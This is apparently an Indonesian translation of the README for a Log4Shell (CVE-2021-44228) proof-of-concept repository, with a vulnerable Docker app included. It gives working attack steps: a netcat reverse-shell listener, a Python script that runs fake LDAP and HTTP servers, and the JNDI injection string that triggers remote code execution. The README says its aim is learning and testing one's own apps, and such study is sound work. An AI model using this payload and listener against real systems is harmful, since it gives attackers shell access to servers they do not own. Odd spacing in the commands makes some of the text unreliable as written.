log4j shell poc

Bukti Konsep untuk kerentanan CVE-2021-44228 yang baru ditemukan.

Baru-baru ini ada kerentanan baru di log4j, perpustakaan java logging yang sangat banyak digunakan seperti elasticsearch, minecraft, dan banyak lainnya.

Dalam repositori ini terdapat contoh aplikasi yang rentan dan eksploitasi proof-of-concept (POC).

Sebagai PoC ada file python yang mengotomatiskan prosesnya.

pip install -r requirements.txt

• Mulai pendengar netcat untuk menerima koneksi shell terbalik.
  

 nc - lvnp 9001

• Luncurkan eksploitasi.
  Catatan: Agar ini berfungsi, arsip java yang diekstrak harus diberi nama: jdk1.8.0_20 , dan berada di direktori yang sama.

$ python3 poc . py - - userip localhost - - webport 8000 - - lport 9001

[!] CVE : CVE - 2021 - 44228
[!] Github repo : https : // github . com / kozmer / log4j - shell - poc

[ + ] Exploit java class created success
[ + ] Setting up fake LDAP server

[ + ] Send me : ${ jndi : ldap : // localhost : 1389 / a }

Listening on 0.0 . 0.0 : 1389

Skrip ini akan menyiapkan server HTTP dan server LDAP untuk Anda, dan juga akan membuat payload yang dapat Anda gunakan untuk menempelkannya ke parameter yang rentan. Setelah ini, jika semuanya berjalan dengan baik, Anda akan mendapatkan shell pada lport.

Ada Dockerfile dengan aplikasi web yang rentan. Anda dapat menggunakannya dengan mengikuti langkah-langkah di bawah ini:

 1 : docker build - t log4j - shell - poc .
2 : docker run -- network host log4j - shell - poc

Setelah berjalan, Anda dapat mengaksesnya di localhost:8080

Oracle untungnya menyediakan arsip untuk semua versi Java sebelumnya:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
Gulir ke bawah ke 8u20 dan unduh file yang sesuai untuk sistem operasi dan perangkat keras Anda.

Catatan: Anda perlu membuat akun untuk dapat mendownload paket.

Setelah Anda mengunduh dan mengekstrak arsip, Anda dapat menemukan java dan beberapa binari terkait di jdk1.8.0_20/bin .
Catatan: Pastikan untuk mengekstrak folder jdk ke dalam repositori ini dengan nama yang sama agar dapat berfungsi.

 ❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

Repositori ini tidak dimaksudkan sebagai eksploitasi sekali klik untuk CVE-2021-44228. Tujuan dari proyek ini adalah untuk membantu orang mempelajari kerentanan ini, dan mungkin menguji aplikasi mereka sendiri (namun ada aplikasi yang lebih baik untuk tujuan ini, misalnya: https://log4shell.tools/).